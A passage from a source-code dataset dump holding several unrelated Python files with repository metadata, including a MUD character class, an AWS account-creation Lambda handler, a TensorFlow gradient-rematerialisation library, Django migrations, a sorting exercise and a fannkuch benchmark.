and its commands only be called by itself, not anyone else.
(to change things, use at_object_creation() instead)
at_after_move - launches the "look" command
at_post_puppet(player) - when Player disconnects from the Character, we
store the current location, so the "unconnected" character
object does not need to stay on grid but can be given a
None-location while offline.
at_pre_puppet - just before Player re-connects, retrieves the character's
old location and puts it back on the grid with a "charname
has connected" message echoed to the room
"""
# initialize skill handler in a lazy fashion
@lazy_property
def skill_handler(self):
return SkillHandler(self)
# initialize loot handler in a lazy fashion
@lazy_property
def loot_handler(self):
return LootHandler(self, DATA_SETS.character_loot_list.model)
def at_object_creation(self):
"""
Called once, when this object is first created. This is the
normal hook to overload for most object types.
"""
super(MudderyCharacter, self).at_object_creation()
# set default values
if not self.attributes.has("level"):
self.db.level = 1
if not self.attributes.has("exp"):
self.db.exp = 0
if not self.attributes.has("hp"):
self.db.hp = 1
if not self.attributes.has("mp"):
self.db.mp = 1
if not self.attributes.has("team"):
self.db.team = 0
# init equipments
if not self.attributes.has("equipments"):
self.db.equipments = {}
if not self.attributes.has("position_names"):
self.db.position_names = {}
self.reset_equip_positions()
if not self.attributes.has("skills"):
self.db.skills = {}
# set quests
if not self.attributes.has("completed_quests"):
self.db.completed_quests = set()
if not self.attributes.has("current_quests"):
self.db.current_quests = {}
self.target = None
self.reborn_time = 0
# A temporary character will be deleted after the combat finished.
self.is_temp = False
def after_data_loaded(self):
"""
Init the character.
"""
super(MudderyCharacter, self).after_data_loaded()
# clear target
self.target = None
# set reborn time
self.reborn_time = getattr(self.dfield, "reborn_time", 0)
# A temporary character will be deleted after the combat finished.
self.is_temp = False
# Character can auto fight.
self.auto_fight = False
# update equipment positions
self.reset_equip_positions()
# load default skills
self.load_default_skills()
# load default objects
self.load_default_objects()
# refresh data
self.refresh_data()
def after_data_key_changed(self):
"""
Called at data_key changed.
"""
super(MudderyCharacter, self).after_data_key_changed()
# reset hp
self.db.hp = self.max_hp
def reset_equip_positions(self):
"""
Reset equipment's position data.
Returns:
None
"""
positions = []
self.db.position_names = {}
# reset equipment's position
for record in DATA_SETS.equipment_positions.objects.all():
positions.append(record.key)
self.db.position_names[record.key] = record.name
for position in self.db.equipments:
if position not in positions:
del self.db.equipments[position]
for position in positions:
if position not in self.db.equipments:
self.db.equipments[position] = None
# reset equipments status
equipped = set()
equipments = self.db.equipments
for position in equipments:
if equipments[position]:
equipped.add(equipments[position])
for content in self.contents:
if content.dbref in equipped:
content.equipped = True
def set_level(self, level):
"""
Set character's level.
Args:
level: character's new level
Returns:
None
"""
if self.db.level == level:
return
self.db.level = level
self.refresh_data()
def refresh_data(self):
"""
Refresh character's data, calculate character's attributes.
"""
# load level data
self.load_model_data()
self.load_custom_attributes(CHARACTER_ATTRIBUTES_INFO)
# load equips
self.ues_equipments()
# load passive skills
self.cast_passive_skills()
def load_model_data(self):
"""
Load character's level data.
"""
model_name = getattr(self.dfield, "model", None)
if not model_name:
model_name = self.get_data_key()
try:
# get data from db
model_data = DATA_SETS.character_models.objects.get(key=model_name, level=self.db.level)
reserved_fields = {"id", "key", "name", "level"}
for field in model_data._meta.fields:
if field.name in reserved_fields:
continue
setattr(self.dfield, field.name, model_data.serializable_value(field.name))
except Exception, e:
logger.log_errmsg("Can't load character %s's level info (%s, %s): %s" %
(self.get_data_key(), model_name, self.db.level, e))
self.max_exp = getattr(self.dfield, "max_exp", 0)
self.max_hp = getattr(self.dfield, "max_hp", 1)
self.give_exp = getattr(self.dfield, "give_exp", 0)
def search_inventory(self, obj_key):
"""
Search specified object in the inventory.
"""
result = [item for item in self.contents if item.get_data_key() == obj_key]
return result
def set_equips(self):
"""
Load equipments data.
"""
# set equipments status
equipped = set()
equipments = self.db.equipments
for position in equipments:
if equipments[position]:
equipped.add(equipments[position])
for content in self.contents:
if content.dbref in equipped:
content.equipped = True
# set character's attributes
self.refresh_data()
def ues_equipments(self):
"""
Add equipment's attributes to the character
"""
# find equipments
equipped = set([equip_id for equip_id in self.db.equipments.values() if equip_id])
# add equipment's attributes
for content in self.contents:
if content.dbref in equipped:
content.equip_to(self)
def load_default_skills(self):
"""
Load character's default skills.
"""
# get character's model name
model_name = getattr(self.dfield, "model", None)
if not model_name:
model_name = self.get_data_key()
# default skills
skill_records = DATA_SETS.default_skills.objects.filter(character=model_name)
default_skill_ids = set([record.skill for record in skill_records])
# remove old default skills
for skill in self.db.skills:
skill_obj = self.db.skills[skill]
if skill_obj.is_default() and skill not in default_skill_ids:
# remove this skill
skill_obj.delete()
del self.db.skills[skill]
# add new default skills
for skill_record in skill_records:
if not self.skill_handler.has_skill(skill_record.skill):
self.skill_handler.learn_skill(skill_record.skill, True)
def cast_passive_skills(self):
"""
Add passive skills' effects to the character
"""
# cast passive skills
self.skill_handler.cast_passive_skills()
def load_default_objects(self):
"""
Load character's default objects.
"""
pass
def at_after_move(self, source_location):
"""
Called after move has completed, regardless of quiet mode or
not. Allows changes to the object due to the location it is
now in.
Args:
source_location : (Object) Where we came from. This may be `None`.
"""
pass
########################################
#
# Skill methods.
#
########################################
def learn_skill(self, skill_key):
"""
Check if the character has this skill.
Args:
skill_key: (string) skill's key
Returns:
(boolean) If the character learned this skill.
"""
return self.skill_handler.learn_skill(skill_key)
def has_skill(self, skill_key):
"""
Check if the character has this skill.
Args:
skill_key: (string) skill's key
Returns:
(boolean) if the character has this skill or not
"""
self.skill_handler.has_skill(skill_key)
def prepare_skill(self, skill_key, target):
"""
Prepare to cast a skill.
"""
if self.is_in_combat():
self.ndb.combat_handler.prepare_skill(skill_key, self, target)
else:
self.cast_skill(skill_key, target)
def cast_skill(self, skill_key, target):
"""
Cast a skill.
"""
self.skill_handler.cast_skill(skill_key, target)
def auto_cast_skill(self):
"""
Auto cast an available skill.
Put this method on the character because TICKER_HANDLER needs a typeclass.
Returns:
None
"""
self.skill_handler.auto_cast_skill()
def send_skill_result(self, result):
"""
Set the result of the skill. The character can send these messages to its surroundings.
Args:
result: (dict)the result of the skill
Returns:
None
"""
if result:
if self.ndb.combat_handler:
# send skill's result to the combat handler
self.ndb.combat_handler.send_skill_result(result)
elif self.location:
# send skill's result to caller's location
self.location.msg_contents({"skill_result": result})
########################################
#
# Attack a target.
#
########################################
def set_target(self, target):
"""
Set character's target.
Args:
target: (object) character's target
Returns:
None
"""
self.target = target
def clear_target(self):
"""
Clear character's target.
"""
self.target = None
def attack_target(self, target, desc=""):
"""
Attack a target.
Args:
target: (object) the target object.
desc: (string) string to describe this attack
Returns:
(boolean) attack begins
"""
if self.is_in_combat():
# already in battle
logger.log_errmsg("%s is already in battle." % self.dbref)
return False
# search target
if not target:
logger.log_errmsg("Can not find the target.")
return False
if not target.is_typeclass(settings.BASE_GENERAL_CHARACTER_TYPECLASS, exact=False):
# Target is not a character.
logger.log_errmsg("Can not attack the target %s." % target.dbref)
return False
if target.is_in_combat():
# obj is already in battle
logger.log_errmsg("%s is already in battle." % target.dbref)
return False
# create a new combat handler
chandler = create_script(settings.COMBAT_HANDLER)
# set combat team and desc
chandler.set_combat({1: [target], 2: [self]}, desc)
return True
def attack_current_target(self, desc=""):
"""
Attack current target.
Args:
desc: (string) string to describe this attack
Returns:
None
"""
self.attack_target(self.target, desc)
def attack_target_dbref(self, target_dbref, desc=""):
"""
Attack a target by dbref.
Args:
target_dbref: (string) the dbref of the target.
desc: (string) string to describe this attack
Returns:
None
"""
target = self.search(target_dbref)
self.attack_target(target, desc)
def attack_target_key(self, target_key, desc=""):
"""
Attack a target.
Args:
target_key: (string) the info key of the target.
desc: (string) string to describe this attack
Returns:
None
"""
target = self.search(target_key)
self.attack_target(target, desc)
def attack_temp_current_target(self, desc=""):
"""
Attack current target's temporary clone object.
Args:
desc: (string) string to describe this attack
Returns:
None
"""
self.attack_temp_target(self.target.get_data_key(), self.target.db.level, desc)
def attack_temp_target(self, target_key, target_level=0, desc=""):
"""
Attack a temporary clone of a target. This creates a new character object for attack.
The origin target will not be affected.
Args:
target_key: (string) the info key of the target.
target_level: (int) target's level
desc: (string) string to describe this attack
Returns:
(boolean) fight begins
"""
if target_level == 0:
# Find the target and get its level.
obj = utils.search_obj_data_key(target_key)
if not obj:
logger.log_errmsg("Can not find the target %s." % target_key)
return False
obj = obj[0]
target_level = obj.db.level
# Create a target.
target = build_object(target_key, set_location=False)
if not target:
logger.log_errmsg("Can not create the target %s." % target_key)
return False
target.set_level(target_level)
target.is_temp = True
return self.attack_target(target, desc)
########################################
#
# Combat methods.
#
########################################
def at_enter_combat_mode(self, combat_handler):
"""
Called when the character enters a combat.
Returns:
None
"""
if not combat_handler:
return
# add the combat handler
self.ndb.combat_handler = combat_handler
# Change the command set.
self.cmdset.add(settings.CMDSET_COMBAT)
def at_combat_start(self):
"""
Called when a character enters a combat.
Args:
combat_handler: the combat's handler
Returns:
None
"""
if self.auto_fight:
# begin auto cast
self.skill_handler.start_auto_combat_skill()
def at_combat_win(self, winners, losers):
"""
Called when the character wins the combat.
Args:
winners: (List) all combat winners.
losers: (List) all combat losers.
Returns:
None
"""
if self.auto_fight:
# stop auto cast
self.skill_handler.stop_auto_combat_skill()
# add exp
# get total exp
exp = 0
for loser in losers:
exp += loser.provide_exp(self)
if exp:
# give experience to the winner
self.add_exp(exp, combat=True)
def at_combat_lose(self, winners, losers):
"""
Called when the character loses the combat.
Args:
winners: (List) all combat winners.
losers: (List) all combat losers.
Returns:
None
"""
if self.auto_fight:
# stop auto cast
self.skill_handler.stop_auto_combat_skill()
# The character is killed.
self.die(winners)
def at_combat_escape(self):
"""
Called when the character escaped from the combat.
Returns:
None
"""
pass
def at_leave_combat_mode(self):
"""
Called when the character leaves a combat.
Returns:
None
"""
# remove the combat handler
del self.ndb.combat_handler
# remove combat commands
self.cmdset.delete(settings.CMDSET_COMBAT)
if self.is_temp:
# notify its location
location = self.location
delete_object(self.dbref)
if location:
for content in location.contents:
if content.has_player:
content.show_location()
else:
if self.is_alive():
# Recover all hp.
self.db.hp = self.max_hp
def is_in_combat(self):
"""
Check if the character is in combat.
Returns:
(boolean) is in combat or not
"""
return bool(self.ndb.combat_handler)
def set_team(self, team_id):
"""
Set character's team id in combat.
Args:
team_id: team's id
Returns:
None
"""
self.db.team = team_id
def get_team(self):
"""
Get character's team id in combat.
Returns:
team id
"""
return self.db.team
def is_alive(self):
"""
Check if the character is alive.
Returns:
(boolean) the character is alive or not
"""
return round(self.db.hp) > 0
def die(self, killers):
"""
This character die.
Args:
killers: (list of objects) characters who kill this
Returns:
None
"""
# trigger event
self.event.at_character_die()
self.event.at_character_kill(killers)
if not self.is_temp and self.reborn_time > 0:
# Set reborn timer.
self.defer = deferLater(reactor, self.reborn_time, self.reborn)
def reborn(self):
"""
Reborn after being killed.
"""
# Recover all hp.
self.db.hp = self.max_hp
# Reborn at its home.
if self.home:
self.move_to(self.home, quiet=True)
def get_combat_commands(self):
"""
This returns a list of combat commands.
Returns:
(list) available commands for combat
"""
commands = []
for key in self.db.skills:
skill = self.db.skills[key]
if skill.passive:
# exclude passive skills
continue
command = {"name": skill.name,
"key": skill.get_data_key(),
"icon": getattr(skill, "icon", None)}
commands.append(command)
return commands
def provide_exp(self, killer):
"""
Calculate the exp provide to the killer.
Args:
killer: (object) the character who kills it.
Returns:
(int) experience give to the killer
"""
if killer:
return self.give_exp
return 0
def add_exp(self, exp, combat=False):
"""
Add character's exp.
Args:
exp: the exp value to add.
Returns:
None
"""
self.db.exp += exp
while self.db.exp >= self.max_exp:
if self.max_exp > 0:
# can upgrade
self.db.exp -= self.max_exp
self.level_up()
else:
# can not upgrade
self.db.exp = 0
break
def level_up(self):
"""
Upgrade level.
Returns:
None
"""
self.set_level(self.db.level + 1)
# recover hp
self.db.hp = self.max_hp
def show_status(self):
"""
Show character's status.
"""
pass
def at_object_delete(self):
"""
Called just before the database object is permanently
delete()d from the database. If this method returns False,
deletion is aborted.
All skills, contents will be removed too.
"""
result = super(MudderyCharacter, self).at_object_delete()
if not result:
return result
# leave combat
if self.ndb.combat_handler:
self.ndb.combat_handler.remove_character(self)
self.skill_handler.remove_all()
for content in self.contents:
content.delete()
return True
| [
"luyijun999@gmail.com"
] | luyijun999@gmail.com |
e94835f09834dfba2a9778514efae815cf3f3c5f | a7d2135ca94722932a0a0edbaf1935055f5fe901 | /unsorted/governance-at-scale-account-factory/account-creation-shared/v4/src/handler.py | b297a00b7606e156a89ac6ee0088d6d0ef0068ed | [
"MIT-0"
] | permissive | awslabs/aws-service-catalog-products | b0a1c9d125758a87dd3913a00dfe029dffbb97ac | 69b295f887582b880f9af50318765f7540f34852 | refs/heads/main | 2023-08-18T06:22:11.366203 | 2022-05-12T20:34:14 | 2022-05-12T20:34:14 | 187,069,705 | 166 | 40 | MIT-0 | 2022-03-07T15:26:26 | 2019-05-16T17:07:08 | Python | UTF-8 | Python | false | false | 4,750 | py | # Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
import json, logging, time
from urllib.request import Request, urlopen
from betterboto import client as betterboto_client
import os
logger = logging.getLogger()
logger.setLevel(logging.INFO)
def handler(event, context):
request_type = event["RequestType"]
try:
logger.info(request_type)
if request_type in ["Create", "Update"]:
assumable_role_in_root_account_arn = os.environ.get(
"ASSUMABLE_ROLE_IN_ROOT_ACCOUNT_ARN"
)
organization_account_access_role = os.environ.get(
"ORGANIZATION_ACCOUNT_ACCESS_ROLE"
)
account_name = event.get("ResourceProperties").get("AccountName")
email = event.get("ResourceProperties").get("Email")
iam_user_access_to_billing = event.get("ResourceProperties").get(
"IamUserAccessToBilling"
)
with betterboto_client.CrossAccountClientContextManager(
"organizations",
assumable_role_in_root_account_arn,
"assumable_org_role",
) as organizations:
logger.info("Checking if need to create")
response = organizations.list_accounts_single_page()
for account in response.get("Accounts", []):
if account.get("Name") == account_name:
account_id = account.get("Id")
logger.info("Already created")
send_response(
event,
context,
"SUCCESS"
if account.get("Status") == "ACTIVE"
else "FAILED",
{
"Message": "Account was already created",
"account_id": account_id,
},
)
logger.info("Creating account")
response = organizations.create_account(
Email=email,
AccountName=account_name,
RoleName=organization_account_access_role,
IamUserAccessToBilling=iam_user_access_to_billing,
)
id = response.get("CreateAccountStatus").get("Id")
logger.info("Waiting")
while response.get("CreateAccountStatus").get("State") == "IN_PROGRESS":
logger.info(
"Still waiting: {}".format(
response.get("CreateAccountStatus").get("State")
)
)
time.sleep(5)
response = organizations.describe_create_account_status(
CreateAccountRequestId=id
)
state = response.get("CreateAccountStatus").get("State")
account_id = response.get("CreateAccountStatus").get("AccountId")
logger.info(f"Finished: {state}")
send_response(
event,
context,
"SUCCESS" if state == "SUCCEEDED" else "FAILED",
{
"Message": "Account was created"
if state == "SUCCEEDED"
else f"Failed: {response.get('CreateAccountStatus').get('FailureReason')}",
"account_id": account_id,
},
)
elif request_type == "Update":
send_response(event, context, "SUCCESS", {"Message": "Updated"})
elif request_type == "Delete":
send_response(event, context, "SUCCESS", {"Message": "Deleted"})
else:
send_response(event, context, "FAILED", {"Message": "Unexpected"})
except Exception as ex:
logger.error(ex)
send_response(event, context, "FAILED", {"Message": "Exception"})
def send_response(e, c, rs, rd):
r = json.dumps(
{
"Status": rs,
"Reason": "CloudWatch Log Stream: " + c.log_stream_name,
"PhysicalResourceId": c.log_stream_name,
"StackId": e["StackId"],
"RequestId": e["RequestId"],
"LogicalResourceId": e["LogicalResourceId"],
"Data": rd,
}
)
d = str.encode(r)
h = {"content-type": "", "content-length": str(len(d))}
req = Request(e["ResponseURL"], data=d, method="PUT", headers=h)
r = urlopen(req)
logger.info("Status message: {} {}".format(r.msg, r.getcode()))
| [
"noreply@github.com"
] | awslabs.noreply@github.com |
f67efaf69ea3e80eb7bb57a0057998fcec851809 | e10a6d844a286db26ef56469e31dc8488a8c6f0e | /etcmodel/layers/recompute_grad.py | 41025413c53c069640314b6ab09d728de3c40781 | [
"Apache-2.0",
"CC-BY-4.0"
] | permissive | Jimmy-INL/google-research | 54ad5551f97977f01297abddbfc8a99a7900b791 | 5573d9c5822f4e866b6692769963ae819cb3f10d | refs/heads/master | 2023-04-07T19:43:54.483068 | 2023-03-24T16:27:28 | 2023-03-24T16:32:17 | 282,682,170 | 1 | 0 | Apache-2.0 | 2020-07-26T15:50:32 | 2020-07-26T15:50:31 | null | UTF-8 | Python | false | false | 9,026 | py | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Library for rematerialization.
Incubates a version of tf.recompute_grad that is XLA compatible.
"""
import collections
import os
import threading
from typing import Deque, List, NamedTuple, Optional, Sequence
from absl import logging
import numpy as np
import tensorflow as tf
class RecomputeContext(
NamedTuple('RecomputeContext', [
('is_recomputing', bool),
('seed', tf.Tensor),
('children', Deque['RecomputeContext']),
])):
"""Context for recomputation.
Attributes:
is_recomputing: Whether we are in a recomputation phase.
seed: Scalar integer tensor that should be used with stateless random ops
for deterministic behavior and correct computation of the gradient.
children: Nested `RecomputeContext` instances. Used internally by
`recompute_grad` to track nested instances of `RecomputeContext`.
"""
def __enter__(self):
return _context_stack.push(self)
def __exit__(self, exc_type, exc_value, traceback):
_context_stack.pop(self)
# Simplified version of `_DefaultStack` in
# https://github.com/tensorflow/tensorflow/blob/master/tensorflow/python/framework/ops.py.
class _ContextStack(threading.local):
"""A thread-local stack for providing implicit recompute contexts."""
def __init__(self):
super(_ContextStack, self).__init__()
self._stack = []
def top(self) -> Optional[RecomputeContext]:
return self._stack[-1] if self._stack else None
def push(self, context: RecomputeContext):
self._stack.append(context)
return context
def pop(self, context: RecomputeContext):
if self._stack[-1] is not context:
raise AssertionError('Nesting violated for RecomputeContext.')
self._stack.pop()
_context_stack = _ContextStack()
def get_recompute_context() -> Optional[RecomputeContext]:
"""Returns the current recomputing context if it exists."""
return _context_stack.top()
# Adapted from
# https://github.com/tensorflow/tensorflow/blob/master/tensorflow/python/ops/control_flow_util.py.
def _get_containing_xla_context(graph: tf.Graph) -> Optional[object]:
"""Returns the first ancestor `XLAControlFlowContext` in the `graph`."""
ctxt = graph._get_control_flow_context() # pylint: disable=protected-access
while ctxt:
if ctxt.IsXLAContext():
return ctxt
ctxt = ctxt.outer_context
return None
def _in_xla_context(graph: Optional[tf.Graph] = None) -> bool:
"""Detects whether we are in an XLA context."""
if '--tf_xla_auto_jit=2' in os.environ.get('TF_XLA_FLAGS', ''):
return True
graph = tf.compat.v1.get_default_graph() if graph is None else graph
while True:
if _get_containing_xla_context(graph) is not None:
return True
try:
graph = graph.outer_graph
except AttributeError:
return False
def _force_data_dependency(
first_compute: Sequence[tf.Tensor],
then_compute: Sequence[tf.Tensor]) -> List[tf.Tensor]:
"""Force all of `then_compute` to depend on all of `first_compute`.
Uses a dummy data dependency, which is useful when running on TPUs because
XLA ignores control dependencies. Only supports float arguments.
Args:
first_compute: Sequence of `Tensor`s to be executed before `then_compute`.
then_compute: Sequence of `Tensor`s to executed after `first_compute`.
Returns:
Sequence of `Tensor`s with same length of `then_compute`.
Raises:
ValueError: if ranks are unknown or types are not floating.
"""
def _first_element(x):
if x.shape.ndims is None:
raise ValueError('Rank of Tensor %s must be known' % x)
ndims = x.shape.ndims
begin = tf.zeros(ndims, dtype=tf.int32)
size = tf.ones(ndims, dtype=tf.int32)
return tf.reshape(tf.slice(x, begin, size), [])
first_compute_sum = tf.add_n(
[_first_element(x) for x in first_compute if x is not None])
dtype = first_compute_sum.dtype
if not dtype.is_floating:
raise ValueError('_force_data_dependency only supports floating dtypes.')
zero = np.finfo(dtype.as_numpy_dtype).tiny * first_compute_sum
return [
x + tf.cast(zero, x.dtype) if x is not None else None
for x in then_compute
]
def _make_seed_if_none(seed: Optional[tf.Tensor]) -> tf.Tensor:
"""Uses the global generator to make a seed if necessary."""
if seed is not None:
return seed
generator = tf.random.experimental.get_global_generator()
# The two seeds for stateless random ops don't have individual semantics and
# are scrambled together, so providing one seed is fine. This makes it easier
# for users to provide a local seed without worrying about integer overflow.
# See `make_seeds` in
# https://github.com/tensorflow/tensorflow/blob/master/tensorflow/python/ops/stateful_random_ops.py.
try:
return generator.uniform_full_int([], tf.int32, name='recompute_grad_seed')
except (RuntimeError, TypeError, ValueError, tf.errors.NotFoundError) as e:
# For a number of reasons, the above operation can fail like using multiple
# graphs or toggling between eager and graph modes. Reset the generator.
logging.warn('Resetting the generator. %s: %s', type(e), e)
tf.random.experimental.set_global_generator(None)
generator = tf.random.experimental.get_global_generator()
return generator.uniform_full_int([], tf.int32, name='recompute_grad_seed')
def recompute_grad(f, seed=None):
"""An eager-compatible version of recompute_grad.
For f(*args, **kwargs), this supports gradients with respect to args, or to
gradients with respect to any variables residing in the kwarg 'variables'.
Note that for keras layer and model objects, this is handled automatically.
Warning: If `f` was originally a tf.keras Model or Layer object, `g` will not
be able to access the member variables of that object, because `g` returns
through the wrapper function `inner`. When recomputing gradients through
objects that inherit from keras, we suggest keeping a reference to the
underlying object around for the purpose of accessing these variables.
Args:
f: function `f(*x)` that returns a `Tensor` or sequence of `Tensor` outputs.
seed: Optional seed for random ops. `seed` should an integer scalar
`Tensor`. When compiling to XLA, `seed` must have dtype `tf.int32`. If
`seed` is not provided one will be generated.
Returns:
A function `g` that wraps `f`, but which recomputes `f` on the backwards
pass of a gradient call.
"""
@tf.custom_gradient
def inner(*args, **kwargs):
"""Inner function closure for calculating gradients."""
# Detect when we're nested and in the backwards pass, so we don't generate
# an additional seed.
parent_context = get_recompute_context()
if parent_context is not None and parent_context.is_recomputing:
# Use the cached context in the recomputation phase.
with parent_context.children.popleft()._replace(
is_recomputing=True) as context:
result = f(*args, **kwargs)
else:
with RecomputeContext(
is_recomputing=False,
seed=_make_seed_if_none(seed),
children=collections.deque()) as context:
result = f(*args, **kwargs)
# In the forward pass, build up a tree of recomputation contexts.
if parent_context is not None and not parent_context.is_recomputing:
parent_context.children.append(context)
def grad(*dresult, **grad_kwargs):
"""Gradient function calculation for inner function."""
variables = grad_kwargs.pop('variables', None)
if grad_kwargs:
raise ValueError('Found unexpected kwargs for `grad`: ',
list(grad_kwargs.keys()))
inputs, seed = list(args), context.seed
if _in_xla_context():
inputs = _force_data_dependency(
tf.nest.flatten(dresult), inputs + [seed])
seed = inputs.pop()
with tf.GradientTape() as tape:
tape.watch(inputs)
if variables is not None:
tape.watch(variables)
with tf.control_dependencies(dresult):
with context._replace(is_recomputing=True, seed=seed):
result = f(*inputs, **kwargs)
kw_vars = []
if variables is not None:
kw_vars = list(variables)
grads = tape.gradient(
result, list(inputs) + kw_vars, output_gradients=dresult)
return grads[:len(inputs)], grads[len(inputs):]
return result, grad
return inner
| [
"copybara-worker@google.com"
] | copybara-worker@google.com |
2dfdd58a22011e454872aacc7370f3e470afa40b | 7cec0bc03100c85ae0dc4f636b92ada46de06802 | /cdad/cdadmap/migrations/0032_auto_20150805_1132.py | 7df38e612401a9aaf367bbd84e02dd4c7db2eef7 | [
"MIT"
] | permissive | NiJeLorg/CDADMap | 200040b45510f7965fd1d772f7e9627561311e70 | 1f03dccf57951748155a0094a5aec3253183c412 | refs/heads/master | 2021-01-17T10:22:06.865934 | 2018-11-01T17:12:22 | 2018-11-01T17:12:22 | 27,398,037 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 671 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('cdadmap', '0031_auto_20150805_1124'),
]
operations = [
migrations.AddField(
model_name='surveypanel',
name='Social_Phone',
field=models.CharField(default=b'', max_length=20),
preserve_default=True,
),
migrations.AddField(
model_name='surveypanel',
name='Social_Phone_KeepPrivate',
field=models.BooleanField(default=False),
preserve_default=True,
),
]
| [
"jd@nijel.org"
] | jd@nijel.org |
3fa45a0670a11d05a42e95d7cd0148e7b33ffd41 | 53c1eb6604f9e060bd6c9ce84395ab1a38d58f6f | /exercise/sorting.py | 94c49a421eddb34bd370dbeccbe9dbaebaa9a100 | [] | no_license | turo62/exercise | 543c684ef3dfe138a5f0d6976b7ff0d9c19553f0 | 3d8d8d8a12bb3885b3015eff0032cd977c02957e | refs/heads/master | 2020-04-14T18:10:31.224244 | 2019-01-03T18:10:55 | 2019-01-03T18:10:55 | 164,008,835 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 733 | py | # Sorting list of numbers entered by the user.
def get_input():
numbers = [int(x) for x in input("Type in series of numbers with whitespaces. Push enter when complete!:").split()]
N = len(numbers)
return N, numbers
def sort_nums(N, numbers):
for i in range(N):
j = 0
while j <= N - 2:
if numbers[j] > numbers[j+1]:
temp = numbers[j+1]
numbers[j+1] = numbers[j]
numbers[j] = temp
else:
j = j+1
return numbers
def main():
N, numbers = get_input()
print(numbers)
sort_nums(N, numbers)
numbers = sort_nums(N, numbers)
print(sort_nums(N, numbers))
if __name__ == '__main__':
main()
| [
"turo62@gmail.com"
] | turo62@gmail.com |
37fe63054bc3e044a4ad349a1a55e8000c0e3c3c | 6a25d7f672c6276543d6d979b61337934557e702 | /test/imports.py | eda2d3118620601da931bf59b44aa1c63c7b5606 | [] | no_license | vsraptor/bi | bfc0bc436fb15d43dc303b948d376980085075b9 | 03b8ec4789592381c370a3c98114e4ba6f3d3fb6 | refs/heads/master | 2020-03-16T17:00:44.720209 | 2018-05-25T01:19:12 | 2018-05-25T01:19:12 | 132,814,076 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 228 | py | import sys, os
def import_lib() :
basedir = os.path.abspath(os.path.dirname(__file__))
for d in ['../lib/encoders', '../lib/cups', '../lib'] :
libdir = os.path.abspath(os.path.join(basedir, d));
sys.path.insert(0,libdir)
| [
"me@me.com"
] | me@me.com |
bbfd907f660bd78d2ae1a976c71f4132b01dc7b3 | 6d0b28f193bec15d979781740200d237fb13d3c1 | /apps/alertdb/migrations/0003_parameter.py | abd04a5853609f707f596f904a15937100cbf190 | [] | no_license | kelvinn/alerted-us-web | f612198c2cb59e79c2ab8386c4aa7c23861d203a | 8d0111b4ca4990cea94f6c96e88db2b1bb44a313 | refs/heads/master | 2021-09-27T00:45:49.630146 | 2020-11-19T19:46:17 | 2020-11-19T22:13:01 | 23,564,957 | 6 | 2 | null | 2021-09-22T17:38:37 | 2014-09-02T04:25:56 | Python | UTF-8 | Python | false | false | 836 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('alertdb', '0002_area'),
]
operations = [
migrations.CreateModel(
name='Parameter',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('value_name', models.CharField(max_length=50)),
('value', models.CharField(max_length=500)),
('cap_info', models.ForeignKey(to_field='id', blank=True, to='alertdb.Info', null=True,
on_delete=models.CASCADE)),
],
options={
},
bases=(models.Model,),
),
]
| [
"kelvin@kelvinism.com"
] | kelvin@kelvinism.com |
eec4eb6256b94dce846461034d55fa43389f032b | 905e7882e7bb870c7de056687578d91789f26b4d | /pre-benchmarks/mike/performance/bm_fannkuch.py | 64d83e661d5d63a8940ba0444191ee299856bd1e | [] | no_license | glennneiger/retic_performance | 091d1749c07496c57e64a6b0ba4fd58b0e52bc45 | 025732be3a426e9188781d0f182918b2ba946dea | refs/heads/master | 2020-04-20T08:33:18.440975 | 2017-03-20T00:12:51 | 2017-03-20T00:12:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,624 | py | # The Computer Language Benchmarks Game
# http://shootout.alioth.debian.org/
#
# contributed by Sokolov Yura
# modified by Tupteq
import optparse
import time
import util
from compat import xrange
def fannkuch(n):
count = list(range(1, n+1))
max_flips = 0
m = n-1
r = n
check = 0
perm1 = list(range(n))
perm = list(range(n))
perm1_ins = perm1.insert
perm1_pop = perm1.pop
while 1:
if check < 30:
#print "".join(str(i+1) for i in perm1)
check += 1
while r != 1:
count[r-1] = r
r -= 1
if perm1[0] != 0 and perm1[m] != m:
perm = perm1[:]
flips_count = 0
k = perm[0]
while k:
perm[:k+1] = perm[k::-1]
flips_count += 1
k = perm[0]
if flips_count > max_flips:
max_flips = flips_count
while r != n:
perm1_ins(r, perm1_pop(0))
count[r] -= 1
if count[r] > 0:
break
r += 1
else:
return max_flips
DEFAULT_ARG = 9
def main(n, timer):
times = []
for i in xrange(n):
t0 = timer()
fannkuch(DEFAULT_ARG)
tk = timer()
times.append(tk - t0)
return times
if __name__ == "__main__":
parser = optparse.OptionParser(
usage="%prog [options]",
description="Test the performance of the Float benchmark")
util.add_standard_options_to(parser)
options, args = parser.parse_args()
util.run_benchmark(options, options.num_runs, main)
| [
"migeed.z@outlook.com"
] | migeed.z@outlook.com |
ce2b7d07311d2c3f5b17ab13e8c2c369c6c13a21 | 035e51eadfb4c391a380d4985f2b82716d5dade9 | /4-1.Seq2Seq/Seq2Seq.py | 874048450ccc3eeada3df47afbd7322a4d31e0be | [
"MIT"
] | permissive | bage79/nlp-tutorial | fa07336c6d0d4f28e5036fdf857702633912405b | 801305b9f6d62daa652a3c335009959f0f3d752f | refs/heads/master | 2021-07-05T19:23:39.933479 | 2020-12-11T11:12:26 | 2020-12-11T11:12:26 | 210,335,384 | 3 | 0 | MIT | 2019-09-23T11:13:58 | 2019-09-23T11:13:57 | null | UTF-8 | Python | false | false | 4,312 | py | # %%
# code by Tae Hwan Jung @graykode
import argparse
import numpy as np
import torch
import torch.nn as nn
# S: Symbol that shows starting of decoding input
# E: Symbol that shows starting of decoding output
